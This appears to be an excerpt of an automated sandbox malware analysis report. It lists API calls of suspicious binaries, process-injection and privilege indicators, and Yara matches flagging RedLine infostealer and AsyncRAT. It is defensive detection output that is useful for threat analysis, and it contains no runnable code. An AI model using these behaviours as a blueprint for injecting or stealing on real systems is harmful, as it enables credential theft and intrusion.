Source: C:\Users\Public\alpha.pif	Code function: 13_2_00037460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	13_2_00037460
Source: C:\Users\Public\alpha.pif	Code function: 13_2_000264CA NtQueryInformationToken,	13_2_000264CA
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00026500 NtQueryInformationToken,NtQueryInformationToken,	13_2_00026500
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0003A135 NtSetInformationFile,	13_2_0003A135
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0003C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	13_2_0003C1FA
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00014E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,	13_2_00014E3B
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00024759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,	13_2_00024759
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00024823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	17_2_00024823
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0002643A NtOpenThreadToken,NtOpenProcessToken,NtClose,	17_2_0002643A
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00037460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	17_2_00037460
Source: C:\Users\Public\alpha.pif	Code function: 17_2_000264CA NtQueryInformationToken,	17_2_000264CA
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00026500 NtQueryInformationToken,NtQueryInformationToken,	17_2_00026500
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0003A135 NtSetInformationFile,	17_2_0003A135
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0003C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	17_2_0003C1FA
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00014E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,	17_2_00014E3B
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00024759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,	17_2_00024759
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029C8670 NtUnmapViewOfSection,	27_2_029C8670
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029C8400 NtReadVirtualMemory,	27_2_029C8400
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029C7A2C NtAllocateVirtualMemory,	27_2_029C7A2C
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029C7D78 NtWriteVirtualMemory,	27_2_029C7D78
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029C8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	27_2_029C8D70
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029CDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	27_2_029CDD70
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029C86F7 NtUnmapViewOfSection,	27_2_029C86F7
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029C7AC9 NtAllocateVirtualMemory,	27_2_029C7AC9
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029C7A2A NtAllocateVirtualMemory,	27_2_029C7A2A
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029CDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	27_2_029CDBB0
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029CDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	27_2_029CDC8C
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029CDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	27_2_029CDC04
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029C8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	27_2_029C8D6E
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029E8670 NtUnmapViewOfSection,	36_2_029E8670
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029E8400 NtReadVirtualMemory,	36_2_029E8400
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029E7A2C NtAllocateVirtualMemory,	36_2_029E7A2C
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029E7D78 NtWriteVirtualMemory,	36_2_029E7D78
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029E8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	36_2_029E8D70
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029EDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	36_2_029EDD70
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029E86F7 NtUnmapViewOfSection,	36_2_029E86F7
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029E7AC9 NtAllocateVirtualMemory,	36_2_029E7AC9
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029E7A2A NtAllocateVirtualMemory,	36_2_029E7A2A
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029EDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	36_2_029EDBB0
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029EDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	36_2_029EDC8C
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029EDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	36_2_029EDC04
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029E8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	36_2_029E8D6E

Contains functionality to communicate with device drivers

Source: C:\Users\Public\alpha.pif

Code function: 13_2_00014C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,

13_2_00014C10

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B08788 CreateProcessAsUserW,

4_2_02B08788

Creates files inside the system directory

Source: C:\Users\Public\alpha.pif	File created: C:\Windows
Source: C:\Users\Public\alpha.pif	File created: C:\Windows \SysWOW64
Source: C:\Windows\System32\alg.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\b2310dff430b0ac5.bin

Deletes files inside the Windows folder

Source: C:\Users\Public\alpha.pif

File deleted: C:\Windows \SysWOW64

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AF20C4	4_2_02AF20C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AFC98E	4_2_02AFC98E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02AFC9DE	4_2_02AFC9DE
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00408C60	12_1_00408C60
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_0040DC11	12_1_0040DC11
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00407C3F	12_1_00407C3F
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00418CCC	12_1_00418CCC
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00406CA0	12_1_00406CA0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_004028B0	12_1_004028B0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_0041A4BE	12_1_0041A4BE
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00418244	12_1_00418244
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00401650	12_1_00401650
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00402F20	12_1_00402F20
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_004193C4	12_1_004193C4
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00418788	12_1_00418788
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00402F89	12_1_00402F89
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00402B90	12_1_00402B90
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_004073A0	12_1_004073A0
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0001540A	13_2_0001540A
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00014C10	13_2_00014C10
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00024875	13_2_00024875
Source: C:\Users\Public\alpha.pif	Code function: 13_2_000174B1	13_2_000174B1
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00019144	13_2_00019144
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0003695A	13_2_0003695A
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00034191	13_2_00034191
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0001EE03	13_2_0001EE03
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00017A34	13_2_00017A34
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00016E57	13_2_00016E57
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0001D660	13_2_0001D660
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00033E66	13_2_00033E66
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00025A86	13_2_00025A86
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0003769E	13_2_0003769E
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00023EB3	13_2_00023EB3
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00024EC1	13_2_00024EC1
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00016B20	13_2_00016B20
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00020740	13_2_00020740
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00020BF0	13_2_00020BF0
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0001540A	17_2_0001540A
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00014C10	17_2_00014C10
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00024875	17_2_00024875
Source: C:\Users\Public\alpha.pif	Code function: 17_2_000174B1	17_2_000174B1
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00019144	17_2_00019144
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0003695A	17_2_0003695A
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00034191	17_2_00034191
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0001EE03	17_2_0001EE03
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00017A34	17_2_00017A34
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00016E57	17_2_00016E57
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0001D660	17_2_0001D660
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00033E66	17_2_00033E66
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00025A86	17_2_00025A86
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0003769E	17_2_0003769E
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00023EB3	17_2_00023EB3
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00024EC1	17_2_00024EC1
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00016B20	17_2_00016B20
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00020740	17_2_00020740
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00020BF0	17_2_00020BF0
Source: C:\Users\Public\xpha.pif	Code function: 18_2_00891E26	18_2_00891E26
Source: C:\Windows\System32\AppVClient.exe	Code function: 22_2_0074A810	22_2_0074A810
Source: C:\Windows\System32\AppVClient.exe	Code function: 22_2_00727C00	22_2_00727C00
Source: C:\Windows\System32\AppVClient.exe	Code function: 22_2_00752D40	22_2_00752D40
Source: C:\Windows\System32\AppVClient.exe	Code function: 22_2_007279F0	22_2_007279F0
Source: C:\Windows\System32\AppVClient.exe	Code function: 22_2_0074EEB0	22_2_0074EEB0
Source: C:\Windows\System32\AppVClient.exe	Code function: 22_2_007492A0	22_2_007492A0
Source: C:\Windows\System32\AppVClient.exe	Code function: 22_2_007493B0	22_2_007493B0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 25_2_0096A810	25_2_0096A810
Source: C:\Windows\System32\FXSSVC.exe	Code function: 25_2_00947C00	25_2_00947C00
Source: C:\Windows\System32\FXSSVC.exe	Code function: 25_2_009479F0	25_2_009479F0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 25_2_00972D40	25_2_00972D40
Source: C:\Windows\System32\FXSSVC.exe	Code function: 25_2_0096EEB0	25_2_0096EEB0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 25_2_009692A0	25_2_009692A0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 25_2_009693B0	25_2_009693B0
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029B20C4	27_2_029B20C4
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 28_2_022B92A0	28_2_022B92A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 28_2_022BEEB0	28_2_022BEEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 28_2_022B93B0	28_2_022B93B0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 28_2_02297C00	28_2_02297C00
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 28_2_022BA810	28_2_022BA810
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 28_2_022C2D40	28_2_022C2D40
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 28_2_022979F0	28_2_022979F0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00408C60	30_2_00408C60
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_0040DC11	30_2_0040DC11
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00407C3F	30_2_00407C3F
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00418CCC	30_2_00418CCC
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00406CA0	30_2_00406CA0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_004028B0	30_2_004028B0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_0041A4BE	30_2_0041A4BE
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00418244	30_2_00418244
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00401650	30_2_00401650
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00402F20	30_2_00402F20
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_004193C4	30_2_004193C4
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00418788	30_2_00418788
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00402F89	30_2_00402F89
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00402B90	30_2_00402B90
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_004073A0	30_2_004073A0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_1004515C	30_2_1004515C
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_10035980	30_2_10035980
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_10006EAF	30_2_10006EAF
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_100439A3	30_2_100439A3
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_100051EE	30_2_100051EE
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_1003D580	30_2_1003D580
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_10007F80	30_2_10007F80
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_10033780	30_2_10033780
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_1003C7F0	30_2_1003C7F0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_26811021	30_2_26811021
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_26811030	30_2_26811030
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00408C60	30_1_00408C60
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_0040DC11	30_1_0040DC11
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00407C3F	30_1_00407C3F
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00418CCC	30_1_00418CCC
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00406CA0	30_1_00406CA0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_004028B0	30_1_004028B0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_0041A4BE	30_1_0041A4BE
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00418244	30_1_00418244
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00401650	30_1_00401650
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00402F20	30_1_00402F20
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_004193C4	30_1_004193C4
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00418788	30_1_00418788
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00402F89	30_1_00402F89
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00402B90	30_1_00402B90
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_004073A0	30_1_004073A0
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029D20C4	36_2_029D20C4

Enables driver privileges

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Load Driver

Enables security privileges

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Security

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02AF44DC appears 74 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B089D0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02AF4500 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02AF4860 appears 949 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B0894C appears 56 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02AF46D4 appears 244 times
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: String function: 029D4860 appears 683 times
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: String function: 029E894C appears 50 times
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: String function: 029D46D4 appears 155 times
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: String function: 029B4860 appears 683 times
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: String function: 029B46D4 appears 155 times
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: String function: 029C894C appears 50 times
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: String function: 0040D606 appears 72 times
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: String function: 0040E1D8 appears 129 times

PE file contains executable resources (Code or Archives)

Source: Acrobat.exe.12.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: chrmstp.exe.12.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: chrmstp.exe.12.dr	Static PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
Source: setup.exe0.12.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: setup.exe0.12.dr	Static PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
Source: 117.0.5938.132_chrome_installer.exe.12.dr	Static PE information: Resource name: B7 type: 7-zip archive data, version 0.4
Source: 117.0.5938.132_chrome_installer.exe.12.dr	Static PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression

PE file contains more sections than normal

Source: ie_to_edge_stub.exe.12.dr	Static PE information: Number of sections : 11 > 10
Source: identity_helper.exe.12.dr	Static PE information: Number of sections : 12 > 10
Source: elevation_service.exe0.12.dr	Static PE information: Number of sections : 12 > 10
Source: chrmstp.exe.12.dr	Static PE information: Number of sections : 14 > 10
Source: elevation_service.exe.12.dr	Static PE information: Number of sections : 12 > 10
Source: msedgewebview2.exe.12.dr	Static PE information: Number of sections : 14 > 10
Source: setup.exe1.12.dr	Static PE information: Number of sections : 13 > 10
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: Number of sections : 13 > 10
Source: setup.exe0.12.dr	Static PE information: Number of sections : 14 > 10

Spawns drivers

Source: unknown

Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys

Yara signature match

Source: 38.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 30.2.wdmvmswJ.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 30.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 30.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 30.2.wdmvmswJ.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 38.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 38.2.wdmvmswJ.pif.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 38.2.wdmvmswJ.pif.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000026.00000001.1748961423.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000001E.00000001.1659980996.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000001E.00000002.1740115481.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000026.00000002.1813978225.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: Acrobat.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
